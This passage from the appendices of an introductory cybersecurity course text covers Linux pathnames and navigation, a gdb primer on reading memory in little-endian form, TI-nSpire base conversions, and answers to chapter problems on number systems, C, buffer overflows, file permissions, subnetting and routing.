Note that in an absolute pathnames, the slash (/) character has two different meanings. The first slash
always refers to the root directory. Any other slashes that may be present simply serve as separators.
Since absolute pathnames can be long, a few shortcuts are provided:



To specify a directory or file in your current directory, you can use just the name of the directory
or file.
A tilde serves as an abbreviation for your own home directory.
A tilde followed by another user’s name serves as an abbreviation for that other user’s home
directory
In the Linux command line, preceding the prompt, you are also provided with an indication of your current
working directory. If you are in your home directory (which, as an absolute path name for our classwork
in EC310, might be something like /home/midshipman ), this will appear as just a tilde since, recall,
a tilde serves as an abbreviation for your own home directory.
3. Relative Pathnames Whereas absolute pathnames always start from the root, relative pathnames
start from your current location (i.e., your working directory). The notation relies on the use of two dots
(..) to serve as an abbreviation for the immediate parent of the current directory.
574
As an example, in the picture above, if your working directory is dane, the relative pathname of the home
directory is simply: .. On the other hand, if your working directory is bob, the relative pathname of the
directory Hacking would be ../dane/Hacking . In other words, to get from bob to Hacking,
you first must go up one directory to home (the parent directory, represented by the two dots), then from
home you go down one directory to dane, and then down to Hacking.
Another shortcut is also available for use in relative pathnames. A single dot (.) can be used as a shorthand
notation for your current working directory.
4. Listing Files You can list the contents of the working directory by using the ls command. For
example, if, in the picture above, your working directory was dane, then the command ls would yield
the results:
Hacking
Cyber
spoofing
You can list the files in a different directory by typing ls followed by the absolute or relative pathname
of the directory you are seeking information about. For example, if your working directory was dane
and you entered ls ../bob , the result would be:
Acme
Ramshead
5. Changing Your Working Directory To change your working directory to another directory, simply
enter the command cd followed by the directory you wish to change to. For example, if your working
directory was dane, you could change your working directory to bob by entering
cd
../bob
When you change your working directory, the command line will update to indicate your new working
directory. For example, if I am the user named midshipman and I change my directory to a subdirectory named work, I will see as my new prompt:
Working directory changed to ~/work
If you find yourself lost in the file system, you can instantly reset your working directory back to your
home directory by simply typing cd by itself. You may have already noticed that we have changed our
working directory at the start of most security exercises by typing:
cd booksrc
6. The root User Every Linux system has a special user named root. The root user is the great-andall-powerful system administrator of the Linux system. The root user can access any file on the system,
including the files of individual users. The root user can read the files of all users, can write over any
files, and can delete any files. The root user can load any software onto the system (e.g., programs). The
root user owns the system.
The dream of all hackers is to somehow become the root user. In Linux, the root user has a special prompt,
the pound sign (#). If you walk up to a computer and see this:
575
that means the root user has logged in and left the computer unattended. That would be bad.
576
Brief Primer on gdb
Getting started. Assume our C program is named test.c. The program is shown below.
#include<stdio.h>
int main( )
{
int a = 2;
int b = 1000;
char x = '$' ;
char phrase[4] = "Fun" ;
printf( "Yes");
printf("No");
}
To run the debugger on the compiled version of test.c, always start by entering:
gcc –g test.c
gdb –q ./a.out
set dis intel
list
If your source code is more than 10 lines, you may have to hit enter again, to list the next 10 lines. We
see this:
midshipman@EC310-VM:~ $ gcc -g test.c
midshipman@EC310-VM:~ $ gdb -q ./a.out
Using host libthread_db library
"/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) set dis intel
(gdb) list
1
#include<stdio.h>
2
int main( )
3
{
4
int a = 2;
5
int b = 1000;
6
7
char x = '$' ;
8
9
char phrase[4] = "Fun" ;
10
(gdb)
11
printf( "Yes");
12
13
printf("No");
14
}
(gdb)
The line numbers shown on the left can be very useful for setting breakpoints. For example, if I wanted
to run the program but have it pause right between the two final printf statements, I would enter
break 12
run
577
(You have already seen us set a breakpoint at main by entering break main… this is the same idea.)
Looking at Memory Based on our program, we should have the following items stored in memory:
2
1000
'$'
"Fun"
The strings "Yes" and "No" are also in memory somewhere, but we'll concentrate just on the integers 2
and 1000, the character '$' and the string "Fun".
If I were to look into memory, I would see this (where all values are hexadecimal):
Looking at this section of memory, it may not be obvious where items are stored. Here is where the
integers 2 and 1000, the character '$' and the string "Fun" are placed:
The string "Fun"
Consulting the handy-dandy ASCII table, we see:
Character
F
u
ASCII hexadecimal value
46
75
578
n
6e
So, sure enough, there it is at memory location bffff808. You should also note that the NULL
terminator appears as the character immediately following the 'n' in "Fun" .
Looking at the memory on the bottom of the previous page, try to guess what will be displayed by each
of the following commands. (The answers immediately follow.)
(a)
(b)
(c)
(d)
x/xb
x/xh
x/xw
x/xs
0xbffff808
0xbffff808
0xbffff808
0xbffff808
Answers:
(a)
(b)
(c)
(d)
46 (displays a byte)
7546 (displays two bytes)
006e7546 (displays four bytes)
"Fun" (displays as a string)
For (b) and (c), note the annoying little-endian.
We can specify the number of units we wish to have printed out by placing a number after the slash. For
example, looking at the memory on the bottom of the previous page, try to guess what will be displayed
by each of the following commands. (The answers immediately follow.)
(a)
(b)
(c)
(d)
(e)
x/xb
x/2b
x/3b
x/4b
x/2h
0xbffff808
0xbffff808
0xbffff808
0xbffff808
0xbffff808
Answers:
(a)
(b)
(c)
(d)
(e)
46 (displays a byte)
0x46
0x75 (displays two bytes)
0x46
0x75
0x6e (displays three bytes)
0x46
0x75
0x6e
0x00 (displays four bytes)
0x7546 0x006e (notice that each half-word is presented in annoying little-endian)
If we suspect that characters are being stored, we can ask that the display be presented as characters by
specifying the c format. Looking at the memory on the bottom of page 584, try to guess what will be
displayed by each of the following commands. (The answers immediately follow.)
(a)
(b)
(c)
(d)
x/c
x/2c
x/3c
x/4c
0xbffff808
0xbffff808
0xbffff808
0xbffff808
579
Answers:
(a)
(b)
(c)
(d)
70
70
70
70
'F'
'F'
'F'
'F'
117 'u'
117 'u' 110 'n'
117 'u' 110 'n' 0 '\0
Suppose we thought an integer was stored at address 0xbffff808. We could check this be entering
x/dw
0xbffff808
If we do this, we see:
0xbffff808:
7238982
Can you guess where on Earth this value 7238982 comes from?
Answer:
We saw earlier that entering: x/xw gave us 006e7546. If we convert the hexadecimal value
006e7546 to a decimal integer, we find its value is 7238982.
The character $
Looking at the bottom of page 584, we see the $ character is stored at location bffff80f.
Looking at the memory on the bottom of page 584, try to guess what will be displayed by each of the
following commands. (The answers immediately follow.)
(a)
(b)
(c)
(d)
x/xb
x/c
x/db
x/s
0xbffff80f
0xbffff80f
0xbffff80f
0xbffff80f
Answers:
(a)
(b)
(c)
(d)
0x24
36 '$'
36
$�\003
Note that 0x24 equals 3610, and that that the last item is gibberish because a string is not stored in this
location.
The integer 1000
So, first, we should convert the decimal value of 1000 to hexadecimal. If we do this, we find it is equal
to 0x3e8.
With reference to the bottom of page 584, answer the following questions.
(a)
Why is 1000 stored in four bytes if it only needs two bytes?
580
(b)
Presuming this value does take four bytes, and thus is equal to 0x000003e8, why is it not stored
with the leading two zeros at the "top" memory locations?
Answers:
(a)
(b)
All integers are stored in four bytes, even if fewer are needed.
Little endian, little endian, little endian.
Looking at the memory on the bottom of page 584, try to guess what will be displayed by each of the
following commands. (The answers immediately follow.)
x/xb
x/xh
x/d
x/2c
0xbffff810
0xbffff810
0xbffff810
0xbffff810
Answers:
(a)
(b)
(c)
(d)
0xe8
0x03e8
1000
gibberish
So… do you think you get it? To see, try this:
Your friend types
x/d
0xbffff813 and sees that the result is 512. Explain!
581
582
Performing Base Conversions on the T1-nSpire CAS Calculator
Performing base conversions on your TI-nSpire calculator is relatively straightforward. Becoming
proficient at using your calculator this way will be useful to you throughout the course, especially as we
begin to perform complex mathematical operations in different number bases.
1. Setup
To begin, ensure that your calculator is set up in the “Auto” calculation mode and the “Decimal”
base system. Your calculator is probably already set up this way, but check it just to be sure.
To check these settings use the following key sequence:



Press [home]
Press 5: Settings
Press 2: Document Settings
Your screen should now look similar to this:
Use the navigation pad to move down to the Calculation Mode setting.
This is the navigation pad
If you get to the Calculation Mode setting and it’s not set to “Auto”, then push the navigation
pad to the right to bring up the menu of Calculation Mode options. Use the navigation pad to
move up or down to select “Auto”, then press the enter key.
583
Repeat this procedure to ensure the Base is set to decimal.
Once the Calculation Mode and Base are properly set, repeatedly press down on the
navigation pad until OK is highlighted and press the enter key.
If you see the dialog box below, press the enter key to select OK.
2. Conventions
Now that your calculator is set up properly, the following conventions apply:



Decimal numbers are typed with no special notation (e.g. 2015)
Hexadecimal numbers are typed by preceding the number with “0h”. That’s a zero, not letter
“O” (e.g. 0h3EA)
Binary numbers are typed by preceding the number with “0b”. Again, it’s zero, not letter
“O” (e.g. 0b100101)
3. The Conversion Operator
Conversion among different bases is handled through the use of the “conversion operator”. It’s a
single character that looks like a right-facing sideways triangle: ► To access this character you
need to bring up the symbol palette on your calculator. You do that by pressing and releasing the
ctrl key, followed by pressing and releasing the symbol palette key. The symbol palette
will then pop-up. The keys and the palette are identified in the picture on the next page.
584
ctrl key
symbol palette key
conversion operator
symbol palette
You select the conversion operator by pressing the enter key. The operator will then show up in
your display.
That seems like a lot of steps for a single character, but it’s not too bad. Once you’ve selected the
operator for the first time, the nSpire calculator remembers that position on the symbol palette.
Hereafter, to select the conversion operator you simply press these three keys one after the other:
cntl, symbol palette, enter
For the remainder of this document, I’ll use ► as shorthand for, “press cntl, symbol
palette, enter.”
4. Performing Conversions
Now we’re ready to put this to good use. Let’s jump right in using some of the examples from the
first lecture. I’ll use this notation, [enter], to mean, “press the enter key”.
Problem: Express the binary number 0b110110 as a decimal number.
Type: 0b110110 [enter]
Solution: 54
Because the calculator is set up to perform Auto Calculations in the Decimal Number System, we
don’t have to use the conversion operator in this example. Simply typing a number in binary (with
the leading “0b”) and pressing enter will tell the nSpire to output the result in decimal. Note, if
you leave off the leading “0b” and type this: 110110 [enter], the nSpire will output 110110.
That’s because the calculator assumes you entered: One hundred ten thousand, one hundred and ten
(the decimal number).
585
Problem: Convert the decimal number 148 to binary.
Type: 148 ► base2 [enter]
Solution: 0b10010100
Here we learn how to tell the nSpire that we want to convert to some other base besides decimal by
typing the characters “base2”. Note, the nSpire will capitalize the “b” in “base2” for you and
redisplay your input as: 148►Base2
Problem: Express the hexadecimal number 0x3CB as a decimal number.
Type: 0h3cb [enter]
Solution: 971
Remember, absent any specified base the nSpire defaults all results to decimal. Also, you will
usually see hexadecimal numbers written with the “0x” prefix in this class. Just remember that the
nSpire expects to see “0h” as the prefix for hexadecimal numbers.
Problem: Convert the decimal number 2576 to hexadecimal.
Type: 2576 ► base16 [enter]
Solution: 0hA10
Problem: Convert the hexadecimal number 0x13F to binary.
Type: 0h13f ► base2 [enter]
Solution: 0b100111111
Problem: Convert the binary number 0b110101001 to hexadecimal.
Type: 0b110101001 ► base16 [enter]
Solution: 0h1A9
Simple calculations are great, but real power comes in more complex calculations. That’s because
you can write statements with calculations on the left side of the conversion operator symbol (►).
Let’s look at an example:
Problem: A section of memory beginning at address 0xD213AC53 contains 438 bytes of data (one
byte of data per address line). The address space looks like this:
Address
0xD213AC53
0xD213AC54
0xD213AC55
0xD213AC56
…
…
…
Data
45
88
3C
E2
…
…
…
586
What hexadecimal memory address comes next after the end of the 438 bytes of data?
Type: 0hd213ac53 + 438 ► base16 [enter]
Solution: 0hD213AE09
For these examples I used “0x” in the problem statement and “0h” in the calculations on purpose.
Remember, the nSpire needs to see the “0h” prefix to represent hexadecimal numbers, but you’ll
often see it written in problems as “0x”. If you make a mistake and type 0xd213ac53 it will be
obvious because the nSpire will assume you want to multiply zero (0) times xd213ac53 and will
show you the result equals zero (0).
After a little practice you’ll get the hang of it and find that you can perform very complex
calculations in different bases quite easily.
587
588
Answers to Selected Problems
Chapter 1
Problem 6:
The hard drive.
Problem 9.
Writing the value of the position below each bit we have
1 0 0
32 16 8
0
4
0
2
0
1
The only position that has a bit value of 1 is the position corresponding to 32.
Thus 1000002  3210
Problem 10.
101012  2110 .
Problem 13.
7810  1001110 2
Problem 16.
0x27 is equivalent to 39 in base-10.
Problem 18.
0x100 is 100000000 in binary.
Problem 21.
Since the first hexadecimal digit is C, the first four bits are 1100. Thus, the fourth
bit is a zero. Note how more difficult this question would have been if the
address was provided in base-10 instead of in base-16.
Problem 26.
0x8D4.
Problem 29.
16 into 730 gives a quotient of 45 with a remainder of A
16 into 45 gives a quotient of 2 with a remainder of D
16 into 2 gives a quotient of 0 with a remainder of 2
Thus, 73010  0x2DA . Since we are asked to use the number of hex digits
appropriate for the x86 architecture, we must use 8 hex digits. Thus, the final
answer is 0x000002DA
Chapter 2
Problem 2.
#include <stdio.h>
int main( )
{
float tempF, tempC;
printf("Please enter your Fahrenheit temperature: ");
scanf("%f", &tempF);
tempC = (5.0/9.0)*(tempF - 32.0);
printf("The equivalent Celsius temperature is %f. \n", tempC);
}
589
Problem 6.
(a) Machine code
(b) High-level code
(c) assembly code
Chapter 3
Problem 1.
Problem 4.
(a)
(b)
Assembly language
This instruction takes the 4 byte value 0x08048484 and stores it in the memory
location that is stored in the esp register.
Problem 10.
(a)
(b)
2
Howitzer
Torpedoes
Problem 11.
(a)
(b)
(c)
mov DWORD PTR [ebp-4],0x5
ebp-4
=
0xbffff814
0x0804838b
char
(b)
Chapter 4
1.
(a)
string
5.
C doesn’t check/prevent access of an element outside the range of an array.
6.
(a)
(b)
(c)
20 bytes
7
The (garbage) value stored in memory immediately below the array would be displayed.
Chapter 5
8.
(e)
9.
My teacher is LCDR Agood day by all!
590
Chapter 6
3.
(d)
4.
Address:
Data:
What is Represented:
Stack Frame Info:
0xBFFFF810
0xBFFFF811
0xBFFFF812
0xBFFFF813
0xBFFFF814
0xBFFFF815
0xBFFFF816
0xBFFFF817
0xBFFFF818
11
00
00
00
g
esp_main
42
00
fox[0]
fox[1]
ebp_main
Chapter 7
4.
(a)
(b)
(c)
(d)
No.
The program is writing more data into the buffer than it can hold—i.e., a buffer overflow.
10 bytes (9 characters plus the NULL).
Increase the size of the buffer or only copy five characters and stop (strncpy).
5.
(a) 15 Bytes of Array + 4 Bytes of int + 4 bytes of prev_ebp =
23 characters. Note that a
NULL character is automatically appended to the end.
(b) No, because year precedes the start of the buffer as it is declared last. Therefore if you
write past the end of the buffer you will overwrite name_len, not year.
Chapter 8
5.
Answer is (a).
Chapter 9
5.
(a) atwood
(b) read, execute
(c) chmod o+x gethappy.exe followed by chmod o+r gethappy.exe (or,
alternatively: chmod o=rx gethappy.exe).
6.
(a) setuid (set user id)
(b) When the user executes the file, they execute the file as the owner of the file.
591
Chapter 11
7.
Application
Transport
Network
Data Link
Physical
__d__
__b__
__e__
__a__
__c__
Chapter 12
8.
(a) 10 Mbps / 6 hosts equals approximately 1.67 Mbps per host
(b) 10 Mbps / 4 hosts = 2.5 Mbps per host
(c) 10 Mbps / 2 Hosts = 5 Mbps per host
Chapter 13
5
Answer is (a)
6
(b)
83 78 a8 1f = 131.120.168.31
7
(a)
(b)
(c)
(d)
255.255.224.0
136.52.96.0
136.52.127.255
8192
8.
Every packet is an independent entity, possible traveling over different paths from source to
destination
10.
146.25.128.0
13.
32 ; 8 ; 0 ; 255
14.
To extract the network ID from an IP address (or to extract the network address).
15.
(a)
(b)
(c)
(d)
19.
(a) True
20.
The valid ones are (b), (d) and (e)
21.
(a)
(b)
(c)
(d)
128.32.14.0
9
510
128.32.15.254
(b) True
(c) False
(d) False
2^5 – 2 = 30
137.18.129.10000001 = 137.18.129.129
137.18.129.10011110 = 137.18.129.158
137.18.129. 10011111 = 137.18.129.159
592
Chapter 15
5.
(a) Distance vector
(b) Link state
6.
Destination
A
B
C
D
E
Next element
A
I
I
E
Total cost
5
3
0
2
5
Chapter 16
6.
The assumption is that each router can trust the information that other routers are sending it.
7.
(a)-(c):
(d). No, the first and last IP addresses of the false network are 8.9.7.80 and 8.9.7.95, respectively.
The webserver’s IP address does not fall within that range. Thus, all traffic destined for the
website will not go to the attacker, but towards the webserver as normal.
(e):
Solution #1 Solution #1 a simple plaintext-password: added to all LSPs so each router can
authenticate the information it is receiving.
Solution #2 an MD5-hash of the OSPF packet and a shared secret key: in OSPF, routers can send
the hash of the OSPF packet and a shared secret key along with their LSP to authenticate
themselves with other routers.
Solution #3 passive interface: once a network administrator sets up a passive interface on a
router, the router will ignore all routing information being sent over that interface.
(f) The Network Administrator
593
Chapter 17
10.
Scalability - Routing tables would become huge.
Administration - owners of individual networks may want to set their own rules for routing
within their networks, without being concerned with what rules others are electing to follow.
11.
San Fran: eBGP; Washington: neither; Paris: eBGP and iBGP; Bonn: neither
Chapter 18
5.
6.
R4 BGP Path Table
Networks
Next
AS
N8, N9
R1
AS1, AS2
N10, N11, N12
R1
AS1, AS3
N13, N14, N15
R9
AS1, AS4
Total Cost: 3+3+3+1 = 10
594